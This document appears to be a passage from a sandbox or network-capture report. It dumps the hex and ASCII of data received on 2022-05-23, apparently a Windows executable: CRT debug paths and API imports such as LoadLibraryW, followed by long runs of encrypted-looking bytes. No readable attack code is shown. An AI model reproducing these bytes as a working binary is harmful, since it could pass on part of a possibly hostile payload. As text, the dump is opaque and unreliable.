                                                    2022-05-23 07:19:16 UTC157INData Raw: 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 6f 00 73 00 66 00 69 00 6e 00 66 00 6f 00 2e 00 63 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 70 00 72 00 65 00 62 00 75 00 69 00 6c 00 64 00 5c 00 65 00 68 00 5c 00 74 00 79 00 70 00 6e 00 61 00 6d 00 65 00 2e 00 63 00 70 00 70 00 00 00 70 00 4e 00 6f 00 64 00 65 00 2d 00 3e 00 5f 00 4e 00 65 00 78 00 74 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 00 00 00 00 00 00 43 00 4f 00 4e
                                                    Data Ascii: ld\self_64_amd64\crt\src\osfinfo.cf:\dd\vctools\crt_bld\self_64_amd64\crt\prebuild\eh\typname.cpppNode->_Next != NULLCON
                                                    2022-05-23 07:19:16 UTC161INData Raw: 00 70 38 00 00 01 00 00 00 30 5b 00 00 0a 5c 00 00 10 13 02 00 00 00 00 00 01 06 02 00 06 92 02 50 11 07 02 00 07 01 11 00 70 38 00 00 01 00 00 00 99 5c 00 00 f7 61 00 00 00 0f 02 00 00 00 00 00 11 08 01 00 08 82 00 00 70 38 00 00 01 00 00 00 d6 62 00 00 24 63 00 00 10 13 02 00 00 00 00 00 01 12 01 00 12 22 00 00 11 09 01 00 09 c2 00 00 70 38 00 00 01 00 00 00 8b 64 00 00 4b 66 00 00 20 0f 02 00 00 00 00 00 01 10 03 00 10 62 0c 70 0b 60 00 00 11 0e 01 00 0e a2 00 00 70 38 00 00 01 00 00 00 72 68 00 00 a6 6b 00 00 20 0f 02 00 00 00 00 00 19 23 02 00 11 01 1f 00 30 31 00 00 e0 00 00 00 01 16 01 00 16 62 00 00 19 19 02 00 07 01 19 00 30 31 00 00 b0 00 00 00 01 08 01 00 08 62 00 00 11 11 01 00 11 c2 00 00 70 38 00 00 01 00 00 00 97 72 00 00 4f 74 00 00 40 0f
                                                    Data Ascii: p80[\Pp8\ap8b$c"p8dKf bp`p8rhk #01b01bp8rOt@
                                                    2022-05-23 07:19:16 UTC165INData Raw: 65 57 00 00 da 02 48 65 61 70 52 65 41 6c 6c 6f 63 00 d9 02 48 65 61 70 51 75 65 72 79 49 6e 66 6f 72 6d 61 74 69 6f 6e 00 00 d7 02 48 65 61 70 46 72 65 65 00 00 34 05 57 72 69 74 65 46 69 6c 65 00 41 03 4c 6f 61 64 4c 69 62 72 61 72 79 57 00 00 2f 03 4c 43 4d 61 70 53 74 72 69 6e 67 57 00 00 69 03 4d 75 6c 74 69 42 79 74 65 54 6f 57 69 64 65 43 68 61 72 00 70 02 47 65 74 53 74 72 69 6e 67 54 79 70 65 57 00 00 8b 03 4f 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6e 67 41 00 00 33 05 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 8c 03 4f 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6e 67 57 00 00 b4 03 52 61 69 73 65 45 78 63 65 70 74 69 6f 6e 00 00 21 04 52 74 6c 50 63 54 6f 46 69 6c 65 48 65 61 64 65 72 00 74 04 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 00 00 a0
                                                    Data Ascii: eWHeapReAllocHeapQueryInformationHeapFree4WriteFileALoadLibraryW/LCMapStringWiMultiByteToWideCharpGetStringTypeWOutputDebugStringA3WriteConsoleWOutputDebugStringWRaiseException!RtlPcToFileHeadertSetFilePointer
                                                    2022-05-23 07:19:16 UTC170INData Raw: 00 00 00 60 2c 01 80 01 00 00 00 60 2c 01 80 01 00 00 00 60 2c 01 80 01 00 00 00 60 2c 01 80 01 00 00 00 60 2c 01 80 01 00 00 00 60 2c 01 80 01 00 00 00 60 2c 01 80 01 00 00 00 60 2c 01 80 01 00 00 00 60 2c 01 80 01 00 00 00 2e 00 00 00 2e 00 00 00 50 be 02 80 01 00 00 00 40 be 02 80 01 00 00 00 08 d4 02 80 01 00 00 00 08 d4 02 80 01 00 00 00 08 d4 02 80 01 00 00 00 08 d4 02 80 01 00 00 00 08 d4 02 80 01 00 00 00 08 d4 02 80 01 00 00 00 08 d4 02 80 01 00 00 00 08 d4 02 80 01 00 00 00 08 d4 02 80 01 00 00 00 7f 7f 7f 7f 7f 7f 7f 7f 44 be 02 80 01 00 00 00 0c d4 02 80 01 00 00 00 0c d4 02 80 01 00 00 00 0c d4 02 80 01 00 00 00 0c d4 02 80 01 00 00 00 0c d4 02 80 01 00 00 00 0c d4 02 80 01 00 00 00 0c d4 02 80 01 00 00 00 20 59 02 80 01 00 00 00 22 5b 02 80
                                                    Data Ascii: `,`,`,`,`,`,`,`,`,..P@D Y"[
                                                    2022-05-23 07:19:16 UTC173INData Raw: 37 64 30 61 0d 0a 00 00 0c 9c 02 00 00 cb 00 00 17 cf 00 00 14 9c 02 00 20 cf 00 00 42 cf 00 00 0c 9f 02 00 50 cf 00 00 7d cf 00 00 24 9c 02 00 80 cf 00 00 ae cf 00 00 44 9c 02 00 f0 cf 00 00 99 d3 00 00 64 9c 02 00 a0 d3 00 00 25 d4 00 00 14 a0 02 00 30 d4 00 00 46 d4 00 00 bc 9c 02 00 90 d4 00 00 00 d9 00 00 d0 9d 02 00 10 d9 00 00 b8 d9 00 00 88 9c 02 00 c0 d9 00 00 e1 d9 00 00 f0 99 02 00 f0 d9 00 00 ba da 00 00 8c 9c 02 00 c0 da 00 00 0e e2 00 00 0c 9f 02 00 10 e2 00 00 e2 e2 00 00 0c 9f 02 00 f0 e2 00 00 fe e4 00 00 0c 9f 02 00 00 e5 00 00 7f e6 00 00 6c 9e 02 00 80 e6 00 00 95 e6 00 00 bc 9c 02 00 a0 e6 00 00 b5 e6 00 00 bc 9c 02 00 c0 e6 00 00 df e6 00 00 0c 9f 02 00 e0 e6 00 00 ff e6 00 00 0c 9f 02 00 00 e7 00 00 8c e7 00 00 c4 9c 02 00 90 e7 00
                                                    Data Ascii: 7d0a BP}$Dd%0Fl
                                                    2022-05-23 07:19:16 UTC177INData Raw: b6 13 25 e3 1b 5d 4d a6 cb 0e 6f 6b d0 26 0d a6 97 da 28 11 52 ce 39 f1 d2 7f d9 54 6a a6 99 6e ea 0f 46 10 f7 2b 41 13 22 0d af 6f ac 23 41 01 96 b1 4a 39 e0 67 4c 20 b9 d0 40 a0 8f a1 3f 87 f0 9f 60 c9 68 7b 59 d0 88 ae 2b 4a ab 1c 6c 0a d2 c5 51 6c be 32 67 15 fa 2e 42 7c ad 80 31 7a 6a 2b ca 67 4b cb 5d 65 7f be f7 2d e7 af 27 3e 69 85 c4 1d ba 87 33 af 44 6a 11 69 8f 5f 48 fb 09 15 52 a6 ea 22 5f be 2d 7c 70 23 b1 ad 68 c9 6e 42 7a 6b 99 35 76 0f be b0 ab 0a 7c 65 7a e6 3c 4e 43 7b ee cb 89 de 11 13 15 67 b1 61 6b ec 21 05 5a ad 11 1d 4b ec 2c 24 7e 19 a3 b0 1e 8f 38 69 47 be 59 1b e3 1b 5d 41 2b 57 ed 0e ed 2c 6c 12 11 92 fe 28 f2 32 67 15 8e 10 9d 58 c4 06 43 58 b4 de 11 cc b5 3a 7b 45 a7 20 44 63 e5 1f 43 45 c0 6c d8 fb b2 2f 0f 48 89 0a 15 4b e1
                                                    Data Ascii: %]Mok&(R9TjnF+A"o#AJ9gL @?`h{Y+JlQl2g.B|1zj+gK]e-'>i3Dji_HR"_-|p#hnBzk5v|ez<NC{gak!ZK,$~8iGY]A+W,l(2gXCX:{E DcCEl/HK
                                                    2022-05-23 07:19:16 UTC181INData Raw: 50 fd c7 a4 af d4 86 d6 93 b7 d5 aa 96 9d 20 be aa 0a bc 2a 62 2f d1 2e 62 2e f1 19 7b 0a eb 4f 56 1e 33 7f b6 d0 05 ef ef 43 dd 21 7a 24 de 8d 4f 9b 68 00 4e 79 e0 c6 7a e8 3c 4d 31 32 ed f4 00 c7 79 69 58 d9 6f 4b 62 e3 cc 0e ce 5a 51 6c bc 02 67 75 f8 2e 42 60 ce f6 43 e8 6a 63 43 2b bd 1d 97 20 be 46 fc 2c ef b2 ee 21 05 5a 6c de c3 83 bf b3 01 4e 79 e0 6f a3 e4 3e 4d f6 32 42 14 22 e1 72 69 10 d5 eb 1a 53 af 0c 0e 32 07 bc 46 35 ce e2 95 d1 ca 27 e0 1d d3 7f dd eb 17 67 36 1f 9d 7d dd b6 79 18 31 98 b8 d9 90 a0 3e 00 01 13 85 2b 68 81 3a 15 3f 9a 6d f1 c1 8a 75 52 36 1a 87 e9 79 e8 1c 74 7b 2f df 97 b7 a1 2a 7e 01 9b d4 cf 6c 65 ad 71 a7 b2 43 fb 33 5c 3a e2 07 46 64 49 c4 9a c8 b4 48 41 34 3c 6c 61 21 f1 60 71 69 e0 6f 4c 54 a6 e3 2e 68 5e 00 b5 48
                                                    Data Ascii: P *b/.b.{OV3C!z$OhNyz<M12yiXoKbZQlgu.B`CjcC+ F,!ZlNyo>M2B"riS2F5'g6}y1>+h:?muR6yt{/*~leqC3\:FdIHA4<la!`qioLT.h^H
                                                    2022-05-23 07:19:16 UTC185INData Raw: db 67 4b 7a 9f a9 92 79 df ba 3d 1e bc 92 dc 72 a0 a7 b1 46 fb 2b 5c 3a e2 37 46 64 3d a9 78 37 f2 78 41 2c 9b a7 27 21 bb 48 71 71 66 aa 24 24 06 df e8 53 39 c9 48 69 79 e4 f1 79 43 98 3d 4d 18 d0 a1 d1 2a e3 04 0e 26 ad b0 d4 ee 3d 2b 1a b0 80 65 d1 11 56 27 f9 2e 47 03 11 8e 76 5f e4 73 11 7c 3c 31 94 98 e4 55 5e 64 28 0f 69 2b af 44 6a 75 55 09 1c 48 b7 01 15 32 91 a1 0f 95 a8 80 5b 9a ea 86 2f e1 04 0e 22 9b 3d 48 71 78 c2 41 55 2e 05 d3 43 72 ec 3c 4e 27 c8 26 10 36 d4 21 13 7d b7 21 40 3b 26 ee 6f 72 cc cc 66 69 2b 21 89 48 79 ee aa 2a 47 82 4c 31 76 66 f8 f2 25 7f 69 b1 fb d2 90 d5 d0 80 27 66 5a b8 cd cc 89 bc 71 f8 17 c9 9f 00 9d 47 78 6a 63 0b ef 71 89 17 ec 72 d2 74 ee 63 27 ea 28 b6 32 ad 10 f6 e0 6c 60 48 c3 7c c4 e3 1b 9f fb 09 15 3e 95 b6
                                                    Data Ascii: gKzy=rF+\:7Fd=x7xA,'!Hqqf$$S9HiyyC=M*&=+eV'.Gv_s|<1U^d(i+DjuUH2[/"=HqxAU.Cr<N'&6!}!@;&orfi+!Hy*GL1vf%i'fZqGxjcqrtc'(2l`H|>
                                                    2022-05-23 07:19:16 UTC189INData Raw: 88 c9 5f 86 c8 c7 7e 39 b1 06 0d 37 19 9f 58 c4 37 5f eb 06 63 43 e3 71 4e 55 f3 37 35 bd 10 5c 31 9e 96 21 bd 61 7d 31 a5 bf 68 c1 23 19 6f ab 33 60 35 c6 7c 5e de 0f c8 9b 37 e0 04 74 1b 98 cb a9 a2 2f de f1 fb c6 9f ff 16 1d f0 1f 4e 0f 9e 74 67 bf 2f 53 01 24 6c 76 d4 28 07 c2 dd dd cf c1 cd cf e0 90 22 dc 6c 5b a0 25 30 b9 d0 ba 80 d7 1d 0c cc 44 46 6b 80 2c 5f be 2c bc 4c 9e 08 2a a9 25 ce 6e db 24 88 81 11 43 35 b6 2f 46 51 f8 70 67 f9 27 43 8f 6e 4b b1 de 10 17 3d c5 1c a0 ea 12 45 e6 3e 22 56 b2 3e 0b e3 45 aa 3a bb e1 1b 78 78 c6 7c 5e 22 cb 61 67 f2 24 b8 d9 6f 4b 02 20 c1 56 42 7a b9 43 a6 76 43 7d fc 56 39 e1 bd c1 6c 78 83 91 b8 9d cb b1 1a 4d 32 1e e6 65 ef 26 4f dd 88 0e 40 9a ce 8a ea 82 06 f6 2e ee 81 0f c1 69 65 ba 3b 4e b7 c5 9e 93 6d
                                                    Data Ascii: _~97X7_cCqNU75\1!a}1h#o3`5|^7t/Ntg/S$lv("l[%0DFk,_,L*%n$C5/FQpg'CnK=E>"V>E:xx|^"ag$oK VBzCvC}V9lxM2e&O@.ie;Nm
                                                    2022-05-23 07:19:16 UTC193INData Raw: 5a 51 ed 41 52 37 31 9d 6b 66 9f 01 56 1f 95 e4 67 43 e3 40 52 27 21 f7 c3 9d e4 10 4f 1f 12 0c 8d 85 92 7c eb 6c df da 4e b0 2e ea cd 70 c3 b2 b0 03 e6 ac 6a 8b 79 ae 1c 74 5b d6 72 61 48 eb 02 7e 21 63 b4 02 67 45 dd 87 36 f4 82 36 43 04 91 21 ad 62 b5 32 7b 19 e5 ac c3 9a e5 1f 43 19 4f bc c2 55 fe ee f3 6b 00 4e 1c 2b 6e 5e c9 b9 95 32 76 66 56 8c 5f 79 e2 d5 88 28 6f 2a 9f a9 01 ac 8b b8 6f ff b7 aa 33 f8 e7 be 5b 45 72 e6 cd b2 60 43 62 f8 63 55 65 bc b0 e4 66 64 6b ee 21 05 32 af 11 1d 17 ec 2c 24 0e 14 6b 6a 5e c1 78 69 09 fd 22 64 54 1b f2 2c d8 db 7f 4b 5e e3 04 0e 1e d3 15 48 1d 3e ce 70 e1 22 ef 1c 61 52 8f 8e d0 9c bc da 83 3d 55 65 de e8 c2 9a 9b ac e2 bd 22 7a 24 65 ed ac 2b a9 ad 96 32 6b 6a 5b 89 91 95 32 76 66 49 a5 da a1 6a 58 50 60 09
                                                    Data Ascii: ZQAR71kfVgC@R'!O|lN.pjyt[raH~!cgE66C!b2{COUkN+n^2vfV_y(o*o3[Er`CbcUefdk!2,$kj^xi"dT,K^H>p"aR=Ue"z$e+2kj[2vfIjXP`
                                                    2022-05-23 07:19:16 UTC197INData Raw: ff 06 05 f0 1f 56 a5 59 53 af bf 2f 23 b0 67 36 76 de 20 77 32 14 9a 9b ba 0a 25 a0 0f 64 22 80 6a 2b af 45 76 95 12 d0 5e c9 79 75 f7 b4 66 40 e5 32 41 60 d9 25 13 d1 52 62 48 6e ed 17 69 e7 60 36 c8 78 41 82 aa d2 44 72 2f f3 92 2b c6 a2 3b f2 8f 66 37 35 87 de 95 60 67 8c 00 85 db aa 82 62 2e 6a 00 a7 26 94 95 a1 8f 79 7d 13 1c 97 40 af 1a 49 6a 98 d9 6e 5f eb 0d 78 22 e7 17 61 62 4c 7f 85 b4 04 5a 46 0c 9c 94 a0 3d 52 65 1e 84 34 1d 1a 5d 3c bc 79 5d e5 1e 5f 10 0f 9d 2d 19 b2 2e fb e3 55 76 ba 26 5a b6 d3 e7 4c 31 cd 2e ea 21 5f 90 a1 a6 af d4 a8 6f 50 4c 2f 56 5a 1d e1 70 96 0b b8 24 ba ed 1d 7d b3 87 7e e3 26 7b e3 71 4e f8 f8 c8 ca bd 10 5c 54 c8 60 2d bd 61 15 9a 9b a2 68 81 0b 71 ab 74 5e 48 bd 38 71 a5 70 c3 24 98 3c 59 70 b3 99 6f eb 05 78 2d
                                                    Data Ascii: VYS/#g6v w2%d"j+Ev^yuf@2A`%RbHni`6xADr/+;f75`gb.j&y}@Ijn_x"abLZF=Re4]<y]_-.Uv&ZL1.!_oPL/VZp$}~&{qN\T`-ahqt^H8qp$<Ypox-
                                                    2022-05-23 07:19:16 UTC204INData Raw: 32 61 66 38 0d 0a 63 43 62 7c f5 9b 7d f4 bc 68 41 74 e2 2b 41 29 2f 77 1d b2 87 63 eb ec 36 79 e0 67 f2 19 3e 4d f6 33 4e 34 f3 55 79 d1 90 fa 2b 6f ed 2d 64 03 e1 51 51 5f ee 4b 8b 9f 71 6a 69 dc ec 72 67 78 57 1e b0 60 34 79 db 4e 36 35 3c 58 f5 c8 61 65 2e ff 34 54 39 6b ec 2d 18 d3 69 62 6a df 05 24 c6 4f 72 48 81 49 47 76 02 1d 48 14 e6 6f 70 c9 5f 7e 5c b8 79 35 b1 06 1d 33 4e 99 58 2e 37 4f 24 e3 26 6b da e1 37 42 b1 b6 40 14 94 5f d1 3c a2 64 5a ec ba 2e 6b aa 2d 20 4f 68 6b 6a df 3d 1c b7 7f 28 36 cb 69 7f 8e 88 73 9a fa 86 29 a2 89 c3 63 d3 1c 4c b4 03 63 8f 7c 23 64 d3 00 52 23 f3 2f 4b c8 37 2c ff 1b 41 07 bc 60 41 44 83 cf 9d 21 7a 6c de 34 9a 7b 6a 00 06 b8 2a 72 e6 35 cf 4f 31 9f 2a bf db a0 be 2c 68 59 4d 24 2a d1 10 2a 66 5a d0 29 05 f1
                                                    Data Ascii: 2af8cCb|}hAt+A)/wc6yg>M3N4Uy+o-dQQ_KqjirgxW`4yN65<Xae.4T9k-ibj$OrHIGvHop_~\y53NX.7O$&k7B@_<dZ.k- Ohkj=(6is)cLc|#dR#/K7,A`AD!zl4{j*r5O1*,hYM$**fZ)
                                                    2022-05-23 07:19:16 UTC215INData Raw: 35 66 36 65 0d 0a 21 ab 41 9e b8 1e e0 4d 3b 63 31 ac 2f 91 34 9b bf 31 f7 2b 8f 86 3f 58 86 99 3d e4 61 ab 1d 87 98 c4 50 51 ab 70 a5 02 89 c2 6a 0d 1d 96 53 ee 3d b9 a2 26 b1 31 f7 2a b6 de 73 5d 80 2c e0 22 ba 69 f3 60 71 69 23 a6 2d ff 06 b8 2f 4e 1e c3 79 9e b8 32 42 78 af 1a ae e0 1c 74 1b 27 a7 2d bf 62 ef 1e 75 44 be 33 8c 71 fa 27 ad 1c ce 37 a0 f3 27 1c ca 26 10 56 b7 26 36 34 3c a2 21 14 cb ec 47 7a af a2 f8 0e 54 62 8b 86 8b c7 9d 5c 48 bd 08 4e ff 19 40 24 de 0c 16 d1 7f 0c f5 a1 2d 37 ed 23 25 49 9d 8b 76 78 fd 7e 2e 94 d9 00 0d 5e 14 95 9c c2 2f 4b 4b 74 fd 21 79 b7 a6 e5 1e 18 d0 a7 c5 32 92 7c ac 72 a6 50 4e b0 26 ad 70 87 8e a8 b0 03 a1 23 52 a8 9c e2 0d 97 a0 22 55 80 be c3 67 5a b8 03 37 76 43 f2 34 a1 80 65 01 72 e6 3d a1 c2 91 62 34
                                                    Data Ascii: 5f6e!AM;c1/41+?X=aPQpjS=&1*s],"i`qi#-/Ny2Bxt'-buD3q'7'&V&64<!GzTb\HN@$-7#%Ivx~.^/KKt!y2|rPN&p#R"UgZ7vC4er=b4
                                                    2022-05-23 07:19:16 UTC231INData Raw: 43 75 a8 36 00 5d 6c 38 7d 3f 48 c3 9d 4f 12 a2 b7 c3 05 b0 9a ee 44 24 5f 4a a9 9f 14 0f 37 95 3d 49 2a dd 8b 02 6a 35 ff 07 11 2d 59 90 d3 bb f3 9c 0c 49 67 43 6d b0 35 5b 65 37 b4 c7 b4 37 6d 67 6a a5 57 20 55 39 ea d0 71 96 48 31 64 ee f9 48 3c 4d b0 8d 4a 92 2f 5f 76 ec 57 58 2b 6f ed ed f8 29 66 5a 89 ee 25 76 c2 80 c1 69 66 58 d4 b9 fe f1 eb e6 f3 61 34 76 f0 38 37 35 b7 e8 d4 68 67 65 99 65 a1 be 68 27 a6 ed 70 4f 31 6b 9d bf 89 d6 48 b8 e3 d6 43 24 5f f8 dc e8 53 2b 6f 50 3b 27 2b a1 df e9 6f 35 76 e2 ac 4c 6a e7 d5 fd 71 67 78 bf 39 00 4b b5 f3 e7 66 37 35 c9 5e 9b 94 e6 e8 99 79 24 55 aa 57 a8 22 81 fb 89 68 6a 5e 10 09 bf 5a 32 ed cd 9c 5c 79 69 d3 dd 9b 6c 2a 68 a0 b7 fa 5b 51 e9 f5 79 c7 bf 76 6a 66 e3 5c e4 61 78 83 56 bc 9d cb 3e d4 60 df
                                                    Data Ascii: Cu6]l8}?HOD$_J7=I*j5-YIgCm5[e77mgjW U9qH1dH<MJ/_vWX+o)fZ%vifXa4v875hgeeh'pO1kHC$_S+oP;'+o5vLjqgx9Kf75^y$UW"hj^Z2\yil*h[Qyvjf\axV>`
                                                    2022-05-23 07:19:16 UTC238INData Raw: 32 64 35 64 0d 0a 5f 65 37 dd 22 6b 65 6b 8e 74 da 85 db 92 bc b3 2b 68 00 bb 6c 3b 6a e6 6d 75 df 15 fd eb 98 24 5f 79 9e b9 7b e1 be c3 6b 82 eb 8f 5e d8 e1 ed 76 43 35 f0 df be 58 45 72 ca 79 67 63 84 e7 e4 76 5f 65 f8 1e 93 65 a5 ce b7 65 21 7a 21 d4 8c bb 2b 68 00 7a 2a 8e 7f d5 cd ec 4d 31 76 ed c5 fc 5f 79 69 b0 cd dc 6f 2a d3 2d 6d 63 5a b8 e5 c3 89 bc f2 f4 b2 66 58 45 d1 ad ff 6a e2 ce ba 34 76 5f 7b bc 50 82 e4 e1 b3 67 65 21 a0 a4 55 39 ea 9e b0 00 4e 31 8c 50 bd f6 fb c8 e1 76 66 40 e4 45 99 69 33 d5 fb 6f 2a 68 7f a3 e3 8a 51 6c 35 1d c6 e5 71 6a 66 32 cc f7 b7 78 6a 63 c2 d7 e4 76 5f 65 37 29 97 8a ef ee b7 65 21 7a af d0 e1 6b 2b 68 e8 da 08 6b 6a 99 cd ec 4d 31 76 03 25 e8 5f f8 ec 88 50 2b 6f 77 4e b7 d5 2a d1 91 e7 b0 a6 43 35 71 e7 6a
                                                    Data Ascii: 2d5d_e7"kekt+hl;jmu$_y{k^vC5XErygcv_eee!z!+hz*M1v_yio*-mcZfXEj4v_{Pge!U9N1Pvf@Ei3o*hQl5qjf2xjcv_e7)e!zk+hkjM1v%_P+owN*C5qj
                                                    2022-05-23 07:19:16 UTC250INData Raw: 31 62 61 36 0d 0a 6c c2 14 ab 70 66 d7 af df 6a e7 2d 55 23 59 d2 f2 08 06 72 0c ff 1a 75 bc 78 2c dd bf 20 0f 4a d6 9b 0f 9f 78 e0 eb b9 e9 4d fb aa 83 58 c1 71 5d b0 03 76 f1 26 c8 79 ae 1d a4 e7 a8 46 68 c9 6f 92 66 cd 6c 35 f7 36 c1 30 99 0c 58 82 37 4f 42 c8 0c 43 e9 79 5e a8 84 f6 df 3e ec 31 43 0c 20 09 57 ad 10 11 ea 5e 40 ab 2d 2a 6a e1 1b b8 b5 09 15 46 ed 05 3c 1b f2 24 78 14 a0 2a 02 e3 1d de ed 17 41 e5 71 52 6b 7d fc 2f 9e 10 cc 36 43 58 82 8d e8 62 34 3e dc a1 67 68 ff 2d e7 87 4f a2 65 5e 1c 41 b3 64 2b 24 8b 97 89 d1 a1 59 48 78 c6 65 52 5e 7d 9e 94 7e 69 57 d4 dd 6f 2a 68 75 84 58 53 51 63 b1 fc 43 35 71 57 7f 17 49 72 68 fc 74 62 43 62 09 07 79 6b 37 3a b9 62 65 6b 67 a2 65 5e 1c e4 dc 28 2b d0 4f a2 f5 25 eb 1a 6c 04 8f 51 89 99 c1 60
                                                    Data Ascii: 1ba6lpfj-U#Yrux, JxMXq]v&yFhofl560X7OBCy^>1C W^@-*jF<$x*AqRk}/6CXb4>gh-Oe^Ad+$YHxeR^}~iWo*huXSQcC5qWIrhtbCbyk7:bekge^(+O%lQ`
                                                    2022-05-23 07:19:16 UTC257INData Raw: 62 66 64 0d 0a 31 06 a8 6f 78 45 3a 95 5a d0 19 25 e1 0e 39 ae bb 0b 48 84 17 77 72 eb 16 53 45 71 c8 a1 ee 72 15 b5 21 40 5b ec 20 39 3e af 18 11 2f a0 2d 10 c5 64 8b e1 13 ac b5 09 15 5e 2e cd 61 b7 31 e0 1c 74 0b 87 bd f8 48 2a 2e d9 95 0c 68 b5 8f 7d f8 36 42 50 0d fb 13 5c 7a 2b ca 1e 10 6e 0a 2d bc d9 74 e6 88 3b 2e ee d8 32 af a4 d1 41 87 68 00 7d ea 58 a3 e6 0e 64 4a 31 3e ef 0d d0 98 3c 99 31 d6 28 6f 17 5d b4 28 66 55 d5 a8 34 76 43 08 f7 21 60 58 4a f6 42 79 6a 63 7e 1c bd 70 5f 6a b3 3e 3d 65 64 56 21 3d 26 7a 50 3c 04 d7 9a 67 00 41 b4 df 6b 5e 48 fb 08 d1 49 67 bf 24 de 34 89 26 3d a1 80 41 2d a8 15 ef 1f b1 ed 40 96 bc 6f a0 65 a1 1d a1 ef e3 3a 6a a2 26 86 31 f7 12 81 6f 80 60 ff e5 1e 83 6e 1b 2a be 19 b2 6e 5c 15 01 4e ba 3e 8e d5 05 dc
                                                    Data Ascii: bfd1oxE:Z%9HwrSEqr!@[ 9>/-d^.a1tH*.h}6BP\z+n-t;.2Ah}XdJ1><1(o](fU4vC!`XJByjc~p_j>=edV!=&zP<gAk^HIg$4&=A-@oe:j&1o`n*n\N>
                                                    2022-05-23 07:19:16 UTC260INData Raw: 33 36 62 31 0d 0a 11 79 6b 66 58 cc 36 43 50 e9 07 67 42 34 9e d4 c5 37 35 74 ee 61 ef 14 64 21 bd a0 71 c1 6b 2b 68 9d f0 38 6b ad da 6c c0 4d 31 76 a9 e8 22 5f 31 ec 98 5f ae e6 2a 68 48 ed e2 7e 51 6d 35 76 03 ab 35 6a df 88 bb 72 42 39 d2 00 2f cd 57 f7 eb 41 37 34 3c 65 5f e2 ed b4 4a fe 00 55 38 6b 2b 3e 89 ca 15 6b 6b 5e 48 fd e9 15 76 67 40 24 54 f8 dd 7c 50 2a 6f 2a 2f 7b 33 b9 9d d5 48 cd 76 43 35 13 4f ef 58 c4 c6 43 80 6a 63 43 c3 9b 2a f3 e4 bb 11 c4 65 64 6b 30 9a ee 9b a5 e1 1d 93 2b 68 00 31 79 bf 87 d5 cc 18 b5 31 76 66 cb a0 7b 79 68 58 50 c3 c8 20 69 48 62 ef 5f 8d 1e 34 76 0b bc 05 4e 36 14 cc 16 43 30 22 e0 27 46 74 76 13 ec 4b 11 04 ec 08 4f 57 e6 45 5e 0c 55 71 e8 4f 4c 20 4e 74 58 a3 12 c3 fb 05 ba a5 2f cb ea a0 a9 25 d5 cc 0f df
                                                    Data Ascii: 36b1ykfX6CPgB475tad!qk+h8klM1v"_1_*hH~Qm5v5jrB9/WA74<e_JU8k+>kk^Hvg@$T|P*o*/{3HvC5OXCjcC*edk0+h1y1vf{yhXP iHb_4vN6C0"'FtvKOWE^UqOL NtX/%
                                                    2022-05-23 07:19:16 UTC273INData Raw: 34 36 31 30 0d 0a 65 e0 d4 4c 0c 1d b6 b9 8a ba 3e 0d d5 05 53 cc d6 b0 9b bf db de be 9e 5d 5b 2b 87 b7 97 48 2a e7 a5 ec 6f 3e 76 4c b1 f8 6a 66 58 ac c6 9b 87 95 a4 06 15 27 12 7c 65 8f 8a 00 d3 46 aa 0a 12 2b f1 69 22 ce 8a ea 82 03 c7 64 1c eb 2b 3f 64 31 3b 76 a1 05 4b 0a ed 11 58 d1 5e 00 db 52 fe e2 a7 3f 3e 63 b4 03 2c d0 95 3d 31 9f 00 15 03 ea 30 63 c2 27 53 f0 39 65 37 f4 51 02 6f ea 12 02 3c 19 20 55 fe 2e 54 1f f7 b3 31 ea 1f 21 65 01 86 fc f7 13 3f 87 fa 49 a4 d3 1d 54 2b a1 25 2f 6e ed 1f 3e 24 be 23 64 bc 3d 4e 46 d3 08 05 8f 84 1a 63 43 23 bf b0 17 e4 f3 f5 3c 65 64 2a 39 3a 7f 21 79 96 f5 a7 e7 28 53 06 b2 87 2a d5 0c 18 3d 79 fd bf c9 60 7b 59 81 56 39 2b 6f 19 a8 c1 6e 42 66 19 e7 30 1f 7f 34 71 ad 22 7c 7d fc f4 7c 6a 2b c6 a2 41 28
                                                    Data Ascii: 4610eL>S][+H*o>vLjfX'|eF+i"d+?d1;vKX^R?>c,=10c'S9e7Qo< U.T1!e?IT+%/n>$#d=NFcC#<ed*9:!y(S*=y`{YV9+onBf04q"|}|j+A(
                                                    2022-05-23 07:19:16 UTC289INData Raw: 21 05 52 6c d8 7c 5b 63 e1 44 6a 11 83 b4 5c b7 c3 f5 d5 ae 61 40 cd 6a 82 96 a7 97 ae 7f 2b 68 48 0c 3a f4 51 d4 9a 08 93 64 34 e1 88 d9 c8 62 66 78 6a 52 12 47 93 3b 5c 89 b6 b0 2c 64 64 6b 23 0b de 85 af d8 29 6a 2b 68 f7 af 89 62 a1 63 c5 17 87 e0 9f 65 8a e5 b6 7f e0 d5 40 2a 6f 2a e9 fd 3a 67 5a 51 23 2a cb 42 f2 f4 72 67 58 45 b9 72 30 6a e2 f6 7a 35 76 5f b6 32 a2 6b ee e9 73 66 65 21 8d c5 94 d3 6d a2 fd 18 4f 31 6b eb eb 50 3d 4d 31 a9 d8 8d 24 d4 fc 71 59 50 2b e4 af 78 49 2a 66 b2 54 a1 cb 89 84 71 55 0a 21 ff fb 72 2f f3 92 2f ce 2f 84 f7 2b 41 57 76 46 99 60 27 ea 20 a9 fb 50 71 59 06 84 27 04 89 b4 73 6b 5e 48 5d f0 d7 76 e7 c5 3c 5e 79 69 60 d3 d4 90 eb c5 50 2b 66 5a 5c ed 80 6e 42 35 71 4c 92 51 45 b5 23 5c 02 1a 0c f7 34 1d 13 41 5f 48
                                                    Data Ascii: !Rl|[cDj\a@j+hH:Qd4bfxjRG;\,ddk#)j+hbce@*o*:gZQ#*BrgXEr0jz5v_2ksfe!mO1kP=M1$qYP+xI*fTqU!r///+AWvF`' PqY'sk^H]v<^yi`P+fZ\nB5qLQE#\4A_H
